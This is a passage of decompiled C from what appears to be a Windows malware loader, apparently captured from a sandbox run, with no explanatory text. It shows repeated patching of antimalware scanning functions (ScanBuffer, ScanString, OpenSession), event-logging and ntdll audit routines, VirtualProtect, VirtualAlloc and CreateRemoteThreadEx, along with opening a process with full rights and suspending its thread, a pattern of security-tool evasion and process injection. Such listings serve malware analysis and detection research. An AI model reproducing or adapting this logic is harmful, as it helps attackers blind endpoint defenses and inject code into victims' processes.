					_t3425 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v644, _t3425, 0x218e77c);
					E02174A98( &_v640, E02174D64(_v644));
					_pop(_t3746); // executed
					E02183690(_v640, _t3377, _t3746, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v648, E02174D64(_v652));
					_push(_v648);
					_t3426 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v660, _t3426, 0x218e77c);
					E02174A98( &_v656, E02174D64(_v660));
					_pop(_t3751); // executed
					E02183690(_v656, _t3377, _t3751, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v664, E02174D64(_v668));
					_push(_v664);
					_t3427 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v676, _t3427, 0x218e77c);
					E02174A98( &_v672, E02174D64(_v676));
					_pop(_t3756); // executed
					E02183690(_v672, _t3377, _t3756, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v680, E02174D64(_v684));
					_push(_v680);
					_t3428 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v692, _t3428, 0x218e77c);
					E02174A98( &_v688, E02174D64(_v692));
					_pop(_t3761); // executed
					E02183690(_v688, _t3377, _t3761, 0x2194b88); // executed
					E021748F4(0x2194b84, "C:\\Users\\Public\\Libraries");
					_t1770 =  *0x2194b84; // 0x3de4d80
					E02174A98( &_v696, E02174D64(_t1770));
					if(E0217811C(_v696) == 0) {
						_t3241 =  *0x2194b84; // 0x3de4d80
						E02174A98( &_v700, E02174D64(_t3241));
						E021782B0(_v700);
					}
					_t1776 =  *0x2194bd4; // 0x3e09388
					_v192 = _t1776;
					_t3378 = _v192;
					if(_t3378 != 0) {
						_t3378 =  *((intOrPtr*)(_t3378 - 4));
					}
					_t1777 =  *0x2194bd4; // 0x3e09388
					E02174DC4(_t1777, _t3378 != 3, 1, 0x2194bd4);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v704, E02174D64(_v708));
					_push(_v704);
					_t3431 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v716, _t3431, 0x218e77c);
					E02174A98( &_v712, E02174D64(_v716));
					_pop(_t3769); // executed
					E02183690(_v712, _t3378, _t3769, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v720, E02174D64(_v724));
					_push(_v720);
					_t3432 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v732, _t3432, 0x218e77c);
					E02174A98( &_v728, E02174D64(_v732));
					_pop(_t3774); // executed
					E02183690(_v728, _t3378, _t3774, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v736, E02174D64(_v740));
					_push(_v736);
					_t3433 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v748, _t3433, 0x218e77c);
					E02174A98( &_v744, E02174D64(_v748));
					_pop(_t3779); // executed
					E02183690(_v744, _t3378, _t3779, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v752, E02174D64(_v756));
					_push(_v752);
					_t3434 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v764, _t3434, 0x218e77c);
					E02174A98( &_v760, E02174D64(_v764));
					_pop(_t3784); // executed
					E02183690(_v760, _t3378, _t3784, 0x2194b88);
					_t1835 =  *0x2194bbc; // 0x3e01ba8
					E02174CB0(_t1835, 0x218e8cc);
					if(_t3378 != 3) {
						L32:
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("Initialize");
						E02174C24();
						E02174A98( &_v1240, E02174D64(_v1244));
						_push(_v1240);
						_t3435 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1252, _t3435, 0x218e77c);
						E02174A98( &_v1248, E02174D64(_v1252));
						_pop(_t3790); // executed
						E02183690(_v1248, _t3378, _t3790, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v1256, E02174D64(_v1260));
						_push(_v1256);
						_t3436 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1268, _t3436, 0x218e77c);
						E02174A98( &_v1264, E02174D64(_v1268));
						_pop(_t3795); // executed
						E02183690(_v1264, _t3378, _t3795, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v1272, E02174D64(_v1276));
						_push(_v1272);
						_t3437 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1284, _t3437, 0x218e77c);
						E02174A98( &_v1280, E02174D64(_v1284));
						_pop(_t3800); // executed
						E02183690(_v1280, _t3378, _t3800, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanString");
						E02174C24();
						E02174A98( &_v1288, E02174D64(_v1292));
						_push(_v1288);
						_t3438 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1300, _t3438, 0x218e77c);
						E02174A98( &_v1296, E02174D64(_v1300));
						_pop(_t3805); // executed
						E02183690(_v1296, _t3378, _t3805, 0x2194b88); // executed
						_t3806 =  *0x2194bdc; // 0x3dd6718
						_t1893 =  *0x2194b74; // 0x3cea6a8
						E0218888C(_t1893, _t3378,  &_v1304, _t3806, _t4332, 0x2194b88);
						E021748F4(0x2194b2c, _v1304);
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v1308, E02174D64(_v1312));
						_push(_v1308);
						_t3440 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1320, _t3440, 0x218e77c);
						E02174A98( &_v1316, E02174D64(_v1320));
						_pop(_t3812); // executed
						E02183690(_v1316, _t3378, _t3812, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v1324, E02174D64(_v1328));
						_push(_v1324);
						_t3441 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1336, _t3441, 0x218e77c);
						E02174A98( &_v1332, E02174D64(_v1336));
						_pop(_t3817); // executed
						E02183690(_v1332, _t3378, _t3817, 0x2194b88);
						_t1925 =  *0x2194bcc; // 0x3e01b88
						_t1926 = E02177D88(_t1925, __eflags);
						_t1927 =  *0x2194b2c; // 0x4b24fa8
						E02188E78(_t1927, _t3378,  &_v1340, _t1926, 0x2194b88);
						E021748F4(0x2194b30, _v1340);
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v1344, E02174D64(_v1348));
						_push(_v1344);
						_t3443 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1356, _t3443, 0x218e77c);
						E02174A98( &_v1352, E02174D64(_v1356));
						_pop(_t3824); // executed
						E02183690(_v1352, _t3378, _t3824, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v1360, E02174D64(_v1364));
						_push(_v1360);
						_t3444 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1372, _t3444, 0x218e77c);
						E02174A98( &_v1368, E02174D64(_v1372));
						_pop(_t3829); // executed
						E02183690(_v1368, _t3378, _t3829, 0x2194b88); // executed
						_t1959 =  *0x2194b30; // 0x4ad2648
						E02188E04(_t1959, _t3378, _t3444,  &_v1380, _t4332, 0x2194b88);
						E02188C58(_v1380, _t3444,  &_v1376);
						E021748F4(0x2194b78, _v1376);
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v1384, E02174D64(_v1388));
						_push(_v1384);
						_t3445 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1396, _t3445, 0x218e77c);
						E02174A98( &_v1392, E02174D64(_v1396));
						_pop(_t3837); // executed
						E02183690(_v1392, _t3378, _t3837, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v1400, E02174D64(_v1404));
						_push(_v1400);
						_t3446 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1412, _t3446, 0x218e77c);
						E02174A98( &_v1408, E02174D64(_v1412));
						_pop(_t3842); // executed
						E02183690(_v1408, _t3378, _t3842, 0x2194b88); // executed
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("ScanString");
						E02174C24();
						E02174A98( &_v1416, E02174D64(_v1420));
						_push(_v1416);
						_t3447 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v1428, _t3447, 0x218e77c);
						E02174A98( &_v1424, E02174D64(_v1428));
						_pop(_t3847); // executed
						E02183690(_v1424, _t3378, _t3847, 0x2194b88);
						_t2007 =  *0x2194bd8; // 0x0
						E02174CB0(_t2007, 0x218e8cc);
						if(__eflags != 0) {
							L37:
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v2132, E02174D64(_v2136));
							_push(_v2132);
							_t3448 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2144, _t3448, 0x218e77c);
							E02174A98( &_v2140, E02174D64(_v2144));
							_pop(_t3853); // executed
							E02183690(_v2140, _t3378, _t3853, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2148, E02174D64(_v2152));
							_push(_v2148);
							_t3449 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2160, _t3449, 0x218e77c);
							E02174A98( &_v2156, E02174D64(_v2160));
							_pop(_t3858); // executed
							E02183690(_v2156, _t3378, _t3858, 0x2194b88);
							_t2037 =  *0x2194bc4; // 0x3e01b48
							E02174CB0(_t2037, 0x218e8cc);
							if(__eflags == 0) {
								_t2540 =  *0x2194bc0; // 0x0
								E02174CB0(_t2540, 0x218e8cc);
								if(__eflags != 0) {
									_t2542 =  *0x2194bc8; // 0x0
									E02174CB0(_t2542, 0x218e8cc);
									if(__eflags != 0) {
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2164, E02174D64(_v2168));
										_push(_v2164);
										_t3467 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2176, _t3467, 0x218e77c);
										E02174A98( &_v2172, E02174D64(_v2176));
										_pop(_t4044); // executed
										E02183690(_v2172, _t3378, _t4044, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2180, E02174D64(_v2184));
										_push(_v2180);
										_t3468 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2192, _t3468, 0x218e77c);
										E02174A98( &_v2188, E02174D64(_v2192));
										_pop(_t4049); // executed
										E02183690(_v2188, _t3378, _t4049, 0x2194b88); // executed
										_t3469 =  *0x2194b34; // 0x3dfa858
										E02174BB0( &_v2196, _t3469, "C:\\Windows\\System32\\");
										WinExec(E02174D64(_v2196), 0); // executed
										Sleep(0x1f4); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2200, E02174D64(_v2204));
										_push(_v2200);
										_t3470 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2212, _t3470, 0x218e77c);
										E02174A98( &_v2208, E02174D64(_v2212));
										_pop(_t4055); // executed
										E02183690(_v2208, _t3378, _t4055, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2216, E02174D64(_v2220));
										_push(_v2216);
										_t3471 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2228, _t3471, 0x218e77c);
										E02174A98( &_v2224, E02174D64(_v2228));
										_pop(_t4060); // executed
										E02183690(_v2224, _t3378, _t4060, 0x2194b88);
										_t2605 =  *0x2194b34; // 0x3dfa858
										E02174A98( &_v2232, E02174D64(_t2605));
										E021857D0(_v2232, _t3378, 0x2194b90, _t4332, 0x2194b88, __eflags); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2236, E02174D64(_v2240));
										_push(_v2236);
										_t3472 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2248, _t3472, 0x218e77c);
										E02174A98( &_v2244, E02174D64(_v2248));
										_pop(_t4067); // executed
										E02183690(_v2244, _t3378, _t4067, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2252, E02174D64(_v2256));
										_push(_v2252);
										_t3473 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2264, _t3473, 0x218e77c);
										E02174A98( &_v2260, E02174D64(_v2264));
										_pop(_t4072); // executed
										E02183690(_v2260, _t3378, _t4072, 0x2194b88);
										_t2639 =  *0x2194b90; // 0xdf8
										 *0x2194b94 = OpenProcess(0x1f0fff, 0, _t2639);
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2268, E02174D64(_v2272));
										_push(_v2268);
										_t3474 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2280, _t3474, 0x218e77c);
										E02174A98( &_v2276, E02174D64(_v2280));
										_pop(_t4077); // executed
										E02183690(_v2276, _t3378, _t4077, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2284, E02174D64(_v2288));
										_push(_v2284);
										_t3475 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2296, _t3475, 0x218e77c);
										E02174A98( &_v2292, E02174D64(_v2296));
										_pop(_t4082); // executed
										E02183690(_v2292, _t3378, _t4082, 0x2194b88);
										_t2669 =  *0x2194b94; // 0x850
										NtSuspendThread(_t2669); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2300, E02174D64(_v2304));
										_push(_v2300);
										_t3476 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2312, _t3476, 0x218e77c);
										E02174A98( &_v2308, E02174D64(_v2312));
										_pop(_t4087); // executed
										E02183690(_v2308, _t3378, _t4087, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2316, E02174D64(_v2320));
										_push(_v2316);
										_t3477 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2328, _t3477, 0x218e77c);
										E02174A98( &_v2324, E02174D64(_v2328));
										_pop(_t4092); // executed
										E02183690(_v2324, _t3378, _t4092, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2332, E02174D64(_v2336));
										_push(_v2332);
										_t3478 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2344, _t3478, 0x218e77c);
										E02174A98( &_v2340, E02174D64(_v2344));
										_pop(_t4097); // executed
										E02183690(_v2340, _t3378, _t4097, 0x2194b88); // executed
										_t2714 = E0217304C(0x38c);
										_push(_t2714);
										L021858FC();
										__eflags = _t2714;
										if(_t2714 == 0) {
											_push(0x218e77c);
											_push( *0x2194bb0);
											_push("ScanBuffer");
											E02174C24();
											E02174A98( &_v2348, E02174D64(_v2352));
											_push(_v2348);
											_t3479 =  *0x2194bb0; // 0x3e01b38
											E02174BB0( &_v2360, _t3479, 0x218e77c);
											E02174A98( &_v2356, E02174D64(_v2360));
											_pop(_t4102); // executed
											E02183690(_v2356, _t3378, _t4102, 0x2194b88); // executed
										} else {
											E021748F4(0x2194bb8, "5E5CDDEE");
										}
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v2364, E02174D64(_v2368));
										_push(_v2364);
										_t3480 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2376, _t3480, 0x218e77c);
										E02174A98( &_v2372, E02174D64(_v2376));
										_pop(_t4107); // executed
										E02183690(_v2372, _t3378, _t4107, 0x2194b88); // executed
										E02174DBC(0x2194b78);
										_t2745 =  *0x2194b94; // 0x850, executed
										E0218779C(_t2745, _t3378, _t4332, 0x2194b88); // executed
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2380, E02174D64(_v2384));
										_push(_v2380);
										_t3482 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2392, _t3482, 0x218e77c);
										E02174A98( &_v2388, E02174D64(_v2392));
										_pop(_t4113); // executed
										E02183690(_v2388, _t3378, _t4113, 0x2194b88);
										_t2761 =  *0x2194b94; // 0x850
										_push(_t2761);
										L02188604();
										_push(0x218e77c);
										_push( *0x2194bb0);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v2396, E02174D64(_v2400));
										_push(_v2396);
										_t3483 =  *0x2194bb0; // 0x3e01b38
										E02174BB0( &_v2408, _t3483, 0x218e77c);
										E02174A98( &_v2404, E02174D64(_v2408));
										_pop(_t4118); // executed
										E02183690(_v2404, _t3378, _t4118, 0x2194b88); // executed
									}
								}
							}
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2412, E02174D64(_v2416));
							_push(_v2412);
							_t3450 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2424, _t3450, 0x218e77c);
							E02174A98( &_v2420, E02174D64(_v2424));
							_pop(_t3864); // executed
							E02183690(_v2420, _t3378, _t3864, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2428, E02174D64(_v2432));
							_push(_v2428);
							_t3451 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2440, _t3451, 0x218e77c);
							E02174A98( &_v2436, E02174D64(_v2440));
							_pop(_t3869); // executed
							E02183690(_v2436, _t3378, _t3869, 0x2194b88);
							_t2067 =  *0x2194bc0; // 0x0
							E02174CB0(_t2067, 0x218e8cc);
							if(__eflags == 0) {
								_t2511 =  *0x2194bc4; // 0x3e01b48
								E02174CB0(_t2511, 0x218e8cc);
								if(__eflags != 0) {
									_t2513 =  *0x2194bc8; // 0x0
									E02174CB0(_t2513, 0x218e8cc);
									if(__eflags != 0) {
										_t2516 = E0217304C(0x38c);
										_push(_t2516);
										L021858FC();
										__eflags = _t2516;
										if(_t2516 == 0) {
											_push(0x218e77c);
											_push( *0x2194bb0);
											_push("ScanBuffer");
											E02174C24();
											E02174A98( &_v2444, E02174D64(_v2448));
											_push(_v2444);
											_t3466 =  *0x2194bb0; // 0x3e01b38
											E02174BB0( &_v2456, _t3466, 0x218e77c);
											E02174A98( &_v2452, E02174D64(_v2456));
											_pop(_t4034);
											E02183690(_v2452, _t3378, _t4034, 0x2194b88);
										} else {
											E021748F4(0x2194bb8, "5E5CDDEE");
										}
										__eflags = 0;
										E02172FC4(0,  &_v2460);
										_push(_v2460);
										_t2535 = E02174DBC(0x2194b78);
										_pop(_t2536);
										E02183990(_t2536, _t3378, _t2535, 0x2194b88, _t4354);
									}
								}
							}
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2464, E02174D64(_v2468));
							_push(_v2464);
							_t3452 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2476, _t3452, 0x218e77c);
							E02174A98( &_v2472, E02174D64(_v2476));
							_pop(_t3875); // executed
							E02183690(_v2472, _t3378, _t3875, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2480, E02174D64(_v2484));
							_push(_v2480);
							_t3453 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2492, _t3453, 0x218e77c);
							E02174A98( &_v2488, E02174D64(_v2492));
							_pop(_t3880); // executed
							E02183690(_v2488, _t3378, _t3880, 0x2194b88);
							_t2097 =  *0x2194bc8; // 0x0
							E02174CB0(_t2097, 0x218e8cc);
							if(__eflags == 0) {
								_t2486 =  *0x2194bc0; // 0x0
								E02174CB0(_t2486, 0x218e8cc);
								if(__eflags != 0) {
									_t2488 =  *0x2194bc4; // 0x3e01b48
									E02174CB0(_t2488, 0x218e8cc);
									if(__eflags != 0) {
										_t2491 = E0217304C(0x38c);
										_push(_t2491);
										L021858FC();
										__eflags = _t2491;
										if(_t2491 == 0) {
											_push(0x218e77c);
											_push( *0x2194bb0);
											_push("ScanBuffer");
											E02174C24();
											E02174A98( &_v2496, E02174D64(_v2500));
											_push(_v2496);
											_t3465 =  *0x2194bb0; // 0x3e01b38
											E02174BB0( &_v2508, _t3465, 0x218e77c);
											E02174A98( &_v2504, E02174D64(_v2508));
											_pop(_t4026);
											E02183690(_v2504, _t3378, _t4026, 0x2194b88);
										} else {
											E021748F4(0x2194bb8, "5E5CDDEE");
										}
										E021848A0(E02174DBC(0x2194b78), _t3378, _t4332, 0x2194b88, _t4354);
									}
								}
							}
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2512, E02174D64(_v2516));
							_push(_v2512);
							_t3454 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2524, _t3454, 0x218e77c);
							E02174A98( &_v2520, E02174D64(_v2524));
							_pop(_t3886); // executed
							E02183690(_v2520, _t3378, _t3886, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("Initialize");
							E02174C24();
							E02174A98( &_v2528, E02174D64(_v2532));
							_push(_v2528);
							_t3455 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2540, _t3455, 0x218e77c);
							E02174A98( &_v2536, E02174D64(_v2540));
							_pop(_t3891); // executed
							E02183690(_v2536, _t3378, _t3891, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2544, E02174D64(_v2548));
							_push(_v2544);
							_t3456 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2556, _t3456, 0x218e77c);
							E02174A98( &_v2552, E02174D64(_v2556));
							_pop(_t3896); // executed
							E02183690(_v2552, _t3378, _t3896, 0x2194b88); // executed
							E02174A98( &_v2560, "VirtualProtect");
							_push(_v2560);
							E02174A98( &_v2564, "kernel32");
							_pop(_t3899);
							E02183690(_v2564, _t3378, _t3899, 0x2194b88);
							E02174A98( &_v2568, "VirtualAlloc");
							_push(_v2568);
							E02174A98( &_v2572, "kernel32");
							_pop(_t3902);
							E02183690(_v2572, _t3378, _t3902, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2576, E02174D64(_v2580));
							_push(_v2576);
							_t3457 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2588, _t3457, 0x218e77c);
							E02174A98( &_v2584, E02174D64(_v2588));
							_pop(_t3907); // executed
							E02183690(_v2584, _t3378, _t3907, 0x2194b88); // executed
							E02174A98( &_v2592, "VirtualProtect");
							_push(_v2592);
							E02174A98( &_v2596, "KernelBase");
							_pop(_t3910);
							E02183690(_v2596, _t3378, _t3910, 0x2194b88);
							E02174A98( &_v2600, "VirtualAlloc");
							_push(_v2600);
							E02174A98( &_v2604, "KernelBase");
							_pop(_t3913);
							E02183690(_v2604, _t3378, _t3913, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v2608, E02174D64(_v2612));
							_push(_v2608);
							_t3458 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2620, _t3458, 0x218e77c);
							E02174A98( &_v2616, E02174D64(_v2620));
							_pop(_t3918); // executed
							E02183690(_v2616, _t3378, _t3918, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("UacInitialize");
							E02174C24();
							E02174A98( &_v2624, E02174D64(_v2628));
							_push(_v2624);
							_t3459 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2636, _t3459, 0x218e77c);
							E02174A98( &_v2632, E02174D64(_v2636));
							_pop(_t3923); // executed
							E02183690(_v2632, _t3378, _t3923, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("UacScan");
							E02174C24();
							E02174A98( &_v2640, E02174D64(_v2644));
							_push(_v2640);
							_t3460 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2652, _t3460, 0x218e77c);
							E02174A98( &_v2648, E02174D64(_v2652));
							_pop(_t3928); // executed
							E02183690(_v2648, _t3378, _t3928, 0x2194b88); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2656, E02174D64(_v2660));
							_push(_v2656);
							_t3461 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2668, _t3461, 0x218e77c);
							E02174A98( &_v2664, E02174D64(_v2668));
							_pop(_t3933); // executed
							E02183690(_v2664, _t3378, _t3933, 0x2194b88); // executed
							_t2240 = E0217304C(0x38c);
							__eflags = _t2240 - 0xc;
							if(_t2240 != 0xc) {
								E021748F4(0x2194bb8, 0x218ea48);
							} else {
								E021748F4(0x2194bb8, "5E5CDDEE");
							}
							E02174A98( &_v2672, "CreateRemoteThreadEx ");
							_push(_v2672);
							E02174A98( &_v2676, "kernelbase");
							_pop(_t3937);
							E02183690(_v2676, _t3378, _t3937, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("UacScan");
							E02174C24();
							E02174A98( &_v2680, E02174D64(_v2684));
							_push(_v2680);
							_t3462 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2692, _t3462, 0x218e77c);
							E02174A98( &_v2688, E02174D64(_v2692));
							_pop(_t3942); // executed
							E02183690(_v2688, _t3378, _t3942, 0x2194b88); // executed
							E02174A98( &_v2696, "ReportEventA");
							_push(_v2696);
							E02174A98( &_v2700, "advapi32");
							_pop(_t3945);
							E02183690(_v2700, _t3378, _t3945, 0x2194b88);
							E02174A98( &_v2704, "SetEncryptedFileMetadata");
							_push(_v2704);
							E02174A98( &_v2708, "advapi32");
							_pop(_t3948);
							E02183690(_v2708, _t3378, _t3948, 0x2194b88);
							E02174A98( &_v2712, "ReportEventW");
							_push(_v2712);
							E02174A98( &_v2716, "advapi32");
							_pop(_t3951);
							E02183690(_v2716, _t3378, _t3951, 0x2194b88);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanString");
							E02174C24();
							E02174A98( &_v2720, E02174D64(_v2724));
							_push(_v2720);
							_t3463 =  *0x2194bb0; // 0x3e01b38
							E02174BB0( &_v2732, _t3463, 0x218e77c);
							E02174A98( &_v2728, E02174D64(_v2732));
							_pop(_t3956); // executed
							E02183690(_v2728, _t3378, _t3956, 0x2194b88); // executed
							E02174A98( &_v2736, "LdrGetDllHandle");
							_push(_v2736);
							_t2302 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2740, E02174D64(_t2302));
							_pop(_t3959);
							E02183690(_v2740, _t3378, _t3959, 0x2194b88);
							E02174A98( &_v2744, "NtPrivilegedServiceAuditAlarm");
							_push(_v2744);
							_t2311 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2748, E02174D64(_t2311));
							_pop(_t3962);
							E02183690(_v2748, _t3378, _t3962, 0x2194b88);
							E02174A98( &_v2752, "LdrQueryProcessModuleInformation");
							_push(_v2752);
							_t2320 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2756, E02174D64(_t2320));
							_pop(_t3965);
							E02183690(_v2756, _t3378, _t3965, 0x2194b88);
							E02174A98( &_v2760, "LdrLoadDll");
							_push(_v2760);
							_t2329 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2764, E02174D64(_t2329));
							_pop(_t3968);
							E02183690(_v2764, _t3378, _t3968, 0x2194b88);
							E02174A98( &_v2768, "NtOpenObjectAuditAlarm");
							_push(_v2768);
							_t2338 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2772, E02174D64(_t2338));
							_pop(_t3971);
							E02183690(_v2772, _t3378, _t3971, 0x2194b88);
							E02174A98( &_v2776, "NtPrivilegeObjectAuditAlarm");
							_push(_v2776);
							_t2347 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2780, E02174D64(_t2347));
							_pop(_t3974);
							E02183690(_v2780, _t3378, _t3974, 0x2194b88);
							E02174A98( &_v2784, "NtAccessCheckAndAuditAlarm");
							_push(_v2784);
							_t2356 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2788, E02174D64(_t2356));
							_pop(_t3977);
							E02183690(_v2788, _t3378, _t3977, 0x2194b88);
							E02174A98( &_v2792, "NtAccessCheck");
							_push(_v2792);
							_t2365 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2796, E02174D64(_t2365));
							_pop(_t3980);
							E02183690(_v2796, _t3378, _t3980, 0x2194b88);
							E02174A98( &_v2800, "NtAllocateUuids");
							_push(_v2800);
							_t2374 =  *0x2194bb8; // 0x3e09b08
							E02174A98( &_v2804, E02174D64(_t2374));
							_pop(_t3983);
							E02183690(_v2804, _t3378, _t3983, 0x2194b88);
							E02174A98( &_v2808, "NtPrivilegeCheck");
							_push(_v2808);
							_t2383 =  *0x2194bb8; // 0x3e09b08
